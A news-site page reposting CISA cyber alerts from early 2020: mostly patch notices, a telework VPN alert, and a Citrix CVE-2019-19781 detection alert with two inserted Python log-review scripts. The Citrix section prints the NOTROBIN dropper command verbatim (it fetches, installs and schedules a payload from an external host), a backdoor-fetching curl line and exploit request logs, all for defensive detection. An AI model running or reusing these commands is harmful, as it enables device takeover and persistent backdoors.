HGN Alerts


"My people are destroyed for lack of knowledge...." Hosea 4:6-7

The natural, inalienable rights and legal rights of the citizenry to be accurately informed must not, by corruption, be perverted, lest that citizenry, acting on such perversion in their daily judgments, certainly suffer to their physical and spiritual detriment.

©2014 Edgar Rogers-Chairman 

hgn.news

HGNAlertSM

NATIONAL/INTERNATIONAL/GALACTIC ALERTS AND EMERGENCY SITUATIONS

HGN News Journal™ "No Secret Hid That Won't Be Revealed"™

HGN News®    2020©All Rights Reserved

"For nothing is secret, that shall not be made manifest; neither any thing hid, that shall not be known and come abroad."  Luke 8:17 

"Every government degenerates when trusted to the rulers of the people alone. And even under the best forms, those entrusted with power have, in time and by slow operations, perverted it into tyranny."                             Thomas Jefferson

"...without active protest and petition, there is no protection against corrupt government and a corrupt society."     Homer Rogers/Edgar Rogers

All information is as is provided by the entity so providing and the presentation here does not constitute any endorsement by HGN News or by that entity of HGN News.

HGN News “No Truth Hid That Won’t Be Revealed”™

National Cyber Awareness System:

04/02/2020 11:39 AM EDT
Original release date: April 2, 2020

The Federal Bureau of Investigation (FBI) has released an article on defending against video-teleconferencing (VTC) hijacking (referred to as “Zoom-bombing” when attacks are to the Zoom VTC platform).  Many organizations and individuals are increasingly dependent on VTC platforms, such as Zoom and Microsoft Teams, to stay connected during the Coronavirus Disease 2019 (COVID-19) pandemic. The FBI has released this guidance in response to an increase in reports of VTC hijacking.

The Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the FBI article as well as the following steps to improve VTC cybersecurity:

  • Ensure meetings are private, either by requiring a password for entry or controlling guest access from a waiting room.
  • Consider security requirements when selecting vendors. For example, if end-to-end encryption is necessary, does the vendor offer it?
  • Ensure VTC software is up to date. See Understanding Patches and Software Updates.

CISA also recommends the following VTC cybersecurity resources:

This product is provided subject to this Notification and this Privacy & Use policy.

National Cyber Awareness System:

04/01/2020 01:24 PM EDT
Original release date: April 1, 2020

The Multi-State Information Sharing & Analysis Center (MS-ISAC) has released an advisory regarding two vulnerable command injection points in DrayTek devices (CVE-2020-8515). An attacker could exploit these vulnerabilities to take control of an affected system. These vulnerabilities were detected in exploits in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review MS-ISAC Advisory 2020-043 and the DrayTek Security Advisory for CVE-2020-8515 and apply the necessary updates and mitigations.

National Cyber Awareness System:

04/01/2020 10:48 AM EDT
Original release date: April 1, 2020

Google has released Chrome version 80.0.3987.162 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

National Cyber Awareness System:

03/25/2020 10:31 AM EDT
Original release date: March 25, 2020

Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:

National Cyber Awareness System:

03/23/2020 06:37 PM EDT
Original release date: March 23, 2020

Microsoft has released a security advisory to address remote code execution vulnerabilities in Adobe Type Manager Library affecting all currently supported versions of Windows and Windows Server operating systems. A remote attacker can exploit these vulnerabilities to take control of an affected system. Microsoft is aware of limited, targeted attacks exploiting these vulnerabilities in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory ADV200006 and the CERT Coordination Center (CERT/CC) Vulnerability Note VU#354840 for more information and apply the necessary mitigations until patches are made available.

National Cyber Awareness System:

03/19/2020 11:23 AM EDT
Original release date: March 19, 2020

Google has released Chrome version 80.0.3987.149 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

National Cyber Awareness System:

03/19/2020 11:31 AM EDT
Original release date: March 19, 2020

Drupal has released security updates to address vulnerabilities affecting Drupal 8.7.x and 8.8.x. An attacker could exploit these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Drupal security release and apply the necessary updates or mitigations.

National Cyber Awareness System:

03/19/2020 11:26 AM EDT
Original release date: March 19, 2020

Cisco has released security updates to address multiple vulnerabilities in SD-WAN Solution software. An attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories webpage.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates.

National Cyber Awareness System:

03/18/2020 11:26 AM EDT
Original release date: March 18, 2020

Adobe has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates.

National Cyber Awareness System:

03/16/2020 11:09 AM EDT
Original release date: March 16, 2020

VMware has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0004 and apply the necessary updates.

National Cyber Awareness System:

03/13/2020 08:08 AM EDT
Original release date: March 13, 2020

Summary

As organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or telework—require an enterprise virtual private network (VPN) solution to connect employees to an organization’s information technology (IT) network. As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity.

Technical Details

The following are cybersecurity considerations regarding telework.

  • As organizations use VPNs for telework, more vulnerabilities are being found and targeted by malicious cyber actors.
  • As VPNs are 24/7, organizations are less likely to keep them updated with the latest security updates and patches.
  • Malicious cyber actors may increase phishing emails targeting teleworkers to steal their usernames and passwords.
  • Organizations that do not use multi-factor authentication (MFA) for remote access are more susceptible to phishing attacks.
  • Organizations may have a limited number of VPN connections, after which point no other employee can telework. With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks.

Mitigations

CISA encourages organizations to review the following recommendations when considering alternate workplace options.

  • Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices.
  • Alert employees to an expected increase in phishing attempts. See CISA Tip Avoiding Social Engineering and Phishing Attacks.
  • Ensure IT security personnel are prepared to ramp up the following remote access cybersecurity tasks: log review, attack detection, and incident response and recovery. Per the National Institute of Standards and Technology (NIST) Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security, these tasks should be documented in the configuration management policy.
  • Implement MFA on all VPN connections to increase security. If MFA is not implemented, require teleworkers to use strong passwords. (See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.)
  • Ensure IT security personnel test VPN limitations to prepare for mass usage and, if possible, implement modifications—such as rate limiting—to prioritize users that will require higher bandwidths.
  • Contact CISA to report incidents, phishing, malware, and other cybersecurity concerns.
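As an added illustration of the "log review, attack detection" task in the mitigations above (example code written for this page, not CISA's, NIST's or any VPN vendor's), the script below reviews VPN authentication logs and flags the risks the alert names: a source address spraying passwords across many teleworker accounts, successful logins that used no second factor, and a spraying source that later logs in successfully. The one-line-per-event log format, its field names and the sample events are constructed assumptions; real VPN concentrators log differently, so `LOG_RE` is the part to adapt.

```python
"""Telework VPN authentication log review (added example, constructed log format).

Assumed hypothetical format, one event per line:
    <ISO-8601 timestamp> <username> <source IP> <SUCCESS|FAIL> mfa=<yes|no|->
Adapt LOG_RE to the real concentrator's log format before use.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<ip>\S+) (?P<result>SUCCESS|FAIL) mfa=(?P<mfa>yes|no|-)$"
)

# Constructed sample events: one source fails against four accounts in quick
# succession and then logs in as one of them without MFA; two ordinary users
# log in normally, one of whom has never enrolled a second factor.
SAMPLE_LOG = """\
2020-03-13T08:00:05Z alice 203.0.113.10 SUCCESS mfa=yes
2020-03-13T08:00:40Z bob 203.0.113.11 SUCCESS mfa=no
2020-03-13T08:01:00Z alice 198.51.100.7 FAIL mfa=-
2020-03-13T08:01:02Z bob 198.51.100.7 FAIL mfa=-
2020-03-13T08:01:04Z carol 198.51.100.7 FAIL mfa=-
2020-03-13T08:01:06Z dave 198.51.100.7 FAIL mfa=-
2020-03-13T08:03:15Z dave 198.51.100.7 SUCCESS mfa=no
2020-03-13T09:30:00Z carol 203.0.113.12 FAIL mfa=-
2020-03-13T09:30:30Z carol 203.0.113.12 SUCCESS mfa=yes
"""


def parse_log(text):
    """Parse lines matching LOG_RE into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def password_spray_sources(events, min_users=3, window=timedelta(minutes=10)):
    """Return {source IP: sorted accounts} for IPs that failed against at least
    min_users distinct accounts inside one window. One address cycling through
    many usernames is the spray pattern; one user mistyping a password is not."""
    fails = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            fails[e["ip"]].append(e)
    flagged = {}
    for ip, evs in fails.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            users = {x["user"] for x in evs[i:] if x["ts"] - start["ts"] <= window}
            if len(users) >= min_users:
                flagged[ip] = sorted(users)
                break
    return flagged


def logins_without_mfa(events):
    """Accounts that authenticated successfully with no second factor."""
    return sorted({e["user"] for e in events if e["result"] == "SUCCESS" and e["mfa"] == "no"})


def spray_followed_by_success(events, spray=None):
    """(user, ip) pairs where a spraying source later logged in successfully:
    the strongest sign that a phished or guessed password is now in use."""
    spray = password_spray_sources(events) if spray is None else spray
    return sorted({(e["user"], e["ip"]) for e in events
                   if e["result"] == "SUCCESS" and e["ip"] in spray})


def review(text):
    """Run all three checks over a log and return the findings."""
    events = parse_log(text)
    spray = password_spray_sources(events)
    return {
        "spray_sources": spray,
        "no_mfa_logins": logins_without_mfa(events),
        "likely_compromised": spray_followed_by_success(events, spray),
    }


if __name__ == "__main__":
    for key, value in review(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The thresholds (`min_users`, `window`) are deliberately conservative so a single user retrying a password is not reported; tune them against a baseline of normal failures before relying on the output, and treat a hit in `likely_compromised` as grounds to reset the account and review its session, not just as a metric.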

References

Revisions

  • March 13, 2020: Initial Version

National Cyber Awareness System:

03/12/2020 01:35 PM EDT
Original release date: March 12, 2020

Microsoft has released out-of-band security updates to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates or workarounds:

  • Microsoft Security Guidance for CVE-2020-0796
  • Microsoft Advisory ADV200005
  • CERT Coordination Center’s Vulnerability Note VU#872016

National Cyber Awareness System:

03/10/2020 01:41 PM EDT
Original release date: March 10, 2020

Microsoft Exchange Servers affected by a remote code execution vulnerability, known as CVE-2020-0688, continue to be an attractive target for malicious cyber actors. A remote attacker can exploit this vulnerability to take control of an affected system that is unpatched.

Although Microsoft disclosed the vulnerability and provided software patches for the various affected products in February 2020, advanced persistent threat actors are targeting unpatched servers, according to recent open-source reports. The Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators to review Microsoft’s Advisory and the National Security Agency’s tweet on CVE-2020-0688 for more information and apply the necessary patches as soon as possible.

National Cyber Awareness System:

03/10/2020 01:24 PM EDT
Original release date: March 10, 2020

Intel has released security updates to address vulnerabilities in multiple products. An authenticated attacker with local access could exploit some of these vulnerabilities to gain escalation of privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates:

National Cyber Awareness System:

03/10/2020 01:40 PM EDT
Original release date: March 10, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s March 2020 Security Update Summary and Deployment Information and apply the necessary updates.

National Cyber Awareness System:

03/11/2020 12:05 PM EDT
Original release date: March 11, 2020

Microsoft has released a security advisory to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker can exploit this vulnerability to take control of an affected system. SMB is a network file-sharing protocol that allows client machines to access files on servers.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory ADV200005 and the CERT Coordination Center’s Vulnerability Note VU#872016 and apply the workaround until patches are made available.

National Cyber Awareness System:

03/06/2020 03:42 PM EST
Original release date: March 6, 2020

Zoho has released a security update on a vulnerability (CVE-2020-10189) affecting ManageEngine Desktop Central build 10.0.473 and below. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine Desktop Central is a unified endpoint management solution that helps companies, including managed service providers (MSPs), to control servers, laptops, smartphones, and tablets from a central location.

The Cybersecurity and Infrastructure Security Agency encourages users and administrators to review the Zoho security update for more information and apply the patch.

National Cyber Awareness System:

03/06/2020 01:53 PM EST
Original release date: March 6, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) warns individuals to remain vigilant for scams related to Coronavirus Disease 2019 (COVID-19). Cyber actors may send emails with malicious attachments or links to fraudulent websites to trick victims into revealing sensitive information or donating to fraudulent charities or causes. Exercise caution in handling any email with a COVID-19-related subject line, attachment, or hyperlink, and be wary of social media pleas, texts, or calls related to COVID-19.

CISA encourages individuals to remain vigilant and take the following precautions.

National Cyber Awareness System:

03/05/2020 11:44 AM EST
Original release date: March 5, 2020

The CERT Coordination Center (CERT/CC) has released information on a vulnerability affecting Point-to-Point Protocol Daemon versions 2.4.2 through 2.4.8. A remote attacker can exploit this vulnerability to take control of an affected system. Point-to-Point Protocol Daemon is used to establish internet links such as those over dial-up modems, DSL connections, and Virtual Private Networks.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review CERT/CC’s Vulnerability Note VU#782301 for more information and apply the necessary patches provided by software vendors.

National Cyber Awareness System:

03/05/2020 11:49 AM EST
Original release date: March 5, 2020

Cisco has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

National Cyber Awareness System:

03/05/2020 04:29 PM EST
Original release date: March 5, 2020

The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an advisory on securing internet-connected cameras such as smart security cameras and baby monitors. An attacker could gain access to unsecured, or poorly secured, internet-connected cameras to obtain live feeds or images.

The following steps can help consumers secure their devices.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the NCSC advisory for more information and refer to CISA’s Tips on Securing the Internet of Things and Home Network Security for additional ways to secure internet-connected devices.

National Cyber Awareness System:

03/04/2020 10:40 AM EST
Original release date: March 4, 2020

The Australian Cyber Security Centre (ACSC) has released a cybersecurity guide outlining strategies for identifying and minimizing risks to web servers from installed content management systems (CMS). This guidance provides effective mitigation strategies organizations can use to better protect their external-facing systems from cyber network exploitation.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review ACSC’s Securing Content Management Systems to learn how to improve CMS security.

National Cyber Awareness System:

02/28/2020 10:48 AM EST
Original release date: February 28, 2020

National Consumer Protection Week (NCPW) is March 1–7. This annual event encourages individuals and businesses to learn about their consumer rights and how to keep themselves secure. The Federal Trade Commission (FTC) and its NCPW partners provide free resources to protect consumers from fraud, scams, and identity theft.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages consumers to review FTC’s NCPW resource page and review the following CISA tips:

National Cyber Awareness System:

02/25/2020 11:19 AM EST
Original release date: February 25, 2020

Google has released Chrome version 80.0.3987.122 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

National Cyber Awareness System:

02/25/2020 05:04 PM EST
Original release date: February 25, 2020

OpenSMTPD has released version 6.6.4p1 to address a critical vulnerability. A remote attacker could exploit this vulnerability to take control of an affected server. OpenSMTPD is an open-source server-side implementation of the Simple Mail Transfer Protocol (SMTP) that is part of the OpenBSD Project.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to apply the necessary update. For OpenBSD implementations, binary patches are available through syspatch; see OpenSMTPD’s Message 04888 for further instruction. For other systems, the update is available at OpenSMTPD’s GitHub release page.

National Cyber Awareness System:

02/26/2020 02:24 PM EST
Original release date: February 26, 2020

MITRE has released version 4.0 of the community-developed Common Weakness Enumeration (CWE) list. Previous CWE list versions describe common software security weaknesses. With version 4.0, the CWE list expands to include hardware security weaknesses. Additionally, version 4.0 simplifies the presentation of weaknesses into various views and adds a search function to enable easier navigation of the information.

The Cybersecurity and Infrastructure Security Agency (CISA) sponsors MITRE’s CWE program, which is a community-based initiative. CISA welcomes new partners to the CWE program. Visit https://cwe.mitre.org to learn how to get involved.

National Cyber Awareness System:

02/27/2020 11:02 AM EST
Original release date: February 27, 2020

Cisco has released security updates to address vulnerabilities affecting FXOS, NX-OS, and Unified Computing System (UCS) software. A remote attacker could exploit some of these vulnerabilities to cause a denial-of-service condition. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories, as well as the Cisco Event Response page, and apply the necessary updates:

National Cyber Awareness System:

02/21/2020 12:04 PM EST
Original release date: February 21, 2020

Google has released Chrome version 80.0.3987.116 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. Note: although Google published an entry on these updates on Tuesday, February 18, the associated Common Vulnerabilities and Exposures numbers and descriptions appeared on the entry today, Friday, February 21.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

National Cyber Awareness System:

02/20/2020 10:42 AM EST
Original release date: February 20, 2020

Adobe has released security updates to address vulnerabilities in After Effects and Media Encoder. An attacker could exploit these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletins APSB20-09 and APSB20-10 and apply the necessary updates.

National Cyber Awareness System:

02/20/2020 10:55 AM EST
Original release date: February 20, 2020

Cisco has released security updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

National Cyber Awareness System:

02/19/2020 01:30 PM EST
Original release date: February 19, 2020

VMware has released security updates to address multiple vulnerabilities in vRealize Operations for Horizon Adapter. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0003 and apply the necessary updates.

National Cyber Awareness System:

02/11/2020 02:14 PM EST
Original release date: February 11, 2020

Intel has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to gain escalation of privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates:

National Cyber Awareness System:

02/11/2020 03:12 PM EST
Original release date: February 11, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s February 2020 Security Update Summary and Deployment Information and apply the necessary updates.

National Cyber Awareness System:

02/11/2020 11:16 AM EST
Original release date: February 11, 2020

Adobe has released security updates to address vulnerabilities in multiple Adobe products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates:

National Cyber Awareness System:

02/11/2020 11:10 AM EST
Original release date: February 11, 2020

Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Mozilla Security Advisories and apply the necessary updates:

National Cyber Awareness System:

02/06/2020 02:13 PM EST
Original release date: February 6, 2020

The Australian Cyber Security Centre (ACSC) has released an advisory on Mailto ransomware incidents. The ACSC has limited information regarding the initial intrusion vector for Mailto, also known as Kazakavkovkiz, but evidence suggests that Mailto actors may have used phishing and password spray attacks to compromise user accounts. The ACSC provides recommendations for users to detect and mitigate these types of attacks and assist with limiting their spread within networks.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory on Mailto ransomware incidents and CISA’s Tip on Protecting Against Ransomware for more information.

National Cyber Awareness System:

02/06/2020 12:11 PM EST
Original release date: February 6, 2020

Cisco has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories webpage.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories, as well as Vulnerability Note #261385 from the CERT Coordination Center (CERT/CC), and apply the necessary updates:

National Cyber Awareness System:

02/04/2020 10:53 AM EST
Original release date: February 4, 2020

The Internal Revenue Service (IRS) has launched its “Identity Theft Central” webpage to provide 24/7 access to online information regarding tax-related identity theft and data security protection. Tax-related identity theft occurs when someone steals personal information to commit tax fraud.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages taxpayers, tax professionals, and businesses to review the IRS news release and CISA’s Tip on Preventing and Responding to Identity Theft for more information.


National Cyber Awareness System:

02/05/2020 11:32 AM EST

Original release date: February 5, 2020

Google has released Chrome 80 (version 80.0.3987.87) for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.


National Cyber Awareness System:

01/31/2020 01:07 PM EST
Original release date: January 31, 2020

Summary

Unknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[1]

Though mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.

Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.

Contact CISA or the FBI to report an intrusion or to request assistance.

Technical Details

Detection

CISA has developed the following procedures for detecting a CVE-2019-19781 compromise. 

HTTP Access and Error Log Review

Context: Host Hunt

Type: Methodology

The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in /var/log. Log files httpaccess.log and httperror.log should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.

  • '*/../vpns/*'
  • '*/vpns/cfg/smb.conf'
  • '*/vpns/portal/scripts/newbm.pl*'
  • '*/vpns/portal/scripts/rmbm.pl*'
  • '*/vpns/portal/scripts/picktheme.pl*'

Note: These URIs were observed in Security Information and Event Management detection content provided by https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml.[2]

Per TrustedSec, a sign of successful exploitation would be a POST request to a URI containing /../ or /vpn, followed by a GET request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like.[3]

10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT "
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"

Additionally, FireEye provided the following grep commands to assist with log review and help to identify suspicious activity.[4]

grep -iE 'POST.*\.pl HTTP/1\.1\" 200 ' /var/log/httpaccess.log -A 1
grep -iE 'GET.*\.xml HTTP/1\.1\" 200' /var/log/httpaccess.log -B 1
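An offline version of the access-log review above, written as an added example (it is not code from the CISA alert, TrustedSec, FireEye or Citrix). It applies the five URI indicators and the TrustedSec pairing heuristic (a 200 POST to a URI containing /../ or /vpn followed by a 200 GET of an .xml file from the same address) to httpaccess.log lines; the sample lines are constructed and use documentation address ranges.

```python
"""Offline review of a Citrix ADC httpaccess.log for CVE-2019-19781 activity.

Added example, not code from the CISA alert or any vendor tool. Log lines in
SAMPLE_LOG are constructed for the demonstration.
"""
import re
from datetime import datetime, timedelta

# Apache common/combined log format as written by the appliance; only the
# fields the review needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# The five URI indicators from the alert, converted from glob form to regex.
INDICATOR_PATTERNS = [
    re.compile(r"/\.\./vpns/"),
    re.compile(r"/vpns/cfg/smb\.conf"),
    re.compile(r"/vpns/portal/scripts/newbm\.pl"),
    re.compile(r"/vpns/portal/scripts/rmbm\.pl"),
    re.compile(r"/vpns/portal/scripts/picktheme\.pl"),
]


def parse_line(line):
    """Return a record dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def matches_indicator(uri):
    """True when the URI matches one of the proof-of-concept indicators."""
    return any(p.search(uri) for p in INDICATOR_PATTERNS)


def review(lines, window_seconds=60):
    """Return (attempts, successes).

    attempts:  every parsed request whose URI matches an indicator, whatever
               its status code (a blocked 403 still identifies the attacking
               address).
    successes: (ip, post_uri, get_uri) triples where a 200 POST to a URI
               containing /../ or /vpn was followed within window_seconds by
               a 200 GET of an .xml file from the same address.
    """
    records = [r for r in (parse_line(line) for line in lines) if r is not None]
    records.sort(key=lambda r: r["ts"])
    attempts = [r for r in records if matches_indicator(r["uri"])]
    successes = []
    for i, post in enumerate(records):
        if post["method"] != "POST" or post["status"] != 200:
            continue
        if "/../" not in post["uri"] and "/vpn" not in post["uri"]:
            continue
        for get in records[i + 1:]:
            if get["ts"] - post["ts"] > timedelta(seconds=window_seconds):
                break  # records are time ordered; nothing later can pair
            if (get["ip"] == post["ip"] and get["method"] == "GET"
                    and get["status"] == 200
                    and get["uri"].lower().endswith(".xml")):
                successes.append((post["ip"], post["uri"], get["uri"]))
                break
    return attempts, successes


# Constructed sample: one ordinary user, one attempt answered with 403 (as the
# Citrix responder-policy mitigation does), one successful exploitation pair,
# and one line that is not a log entry at all.
SAMPLE_LOG = [
    '198.51.100.20 - - [10/Jan/2020:13:20:01 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2020:13:22:10 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 403 215 "-" "python-requests/2.22.0"',
    '198.51.100.7 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "-" "curl/7.64.1"',
    '198.51.100.7 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "curl/7.64.1"',
    '198.51.100.20 - - [10/Jan/2020:13:25:00 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 3300 "-" "Mozilla/5.0"',
    "this line is not an access-log entry",
]

if __name__ == "__main__":
    found_attempts, found_successes = review(SAMPLE_LOG)
    for r in found_attempts:
        print(f"attempt  {r['ip']} {r['method']} {r['uri']} -> {r['status']}")
    for ip, post_uri, get_uri in found_successes:
        print(f"SUCCESS  {ip} POST {post_uri} then GET {get_uri}")
```

Point `review()` at the lines of /var/log/httpaccess.log (and the rotated .gz archives) to get the attacking addresses from `attempts` and the confirmed POST/GET pairs from `successes`.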

Running Processes Review

Context: Host Hunt

Type: Methodology

Reviewing the running processes on a system suspected of compromise for processes running under the nobody user can identify potential backdoors.

ps auxd | grep nobody

Analysts should review the ps output for suspicious entries such as this:

nobody    63390  0.0  0.0  8320    16  ??  I     1:35PM   0:00.00 | | `-- sh -c uname & curl -o - http://10.1.1.2/backdoor

Further pivoting can be completed using the process ID from the ps output:

lsof -p <pid>

Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the httpd process.

Checking for NOTROBIN Presence

Context: Host Hunt

Type: Methodology

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

The above is the NOTROBIN Bash exploit code. To check for NOTROBIN presence, analysts should look for the staging directory at /tmp/.init as well as httpd processes running as a cron job.

Running the command find / -name ".init" 2> /tmp/error.log should return the path to the created staging directory, while the redirection sends all errors to the file /tmp/error.log instead of the terminal.

Additional /var/log Review

Context: Host Hunt

Type: Methodology

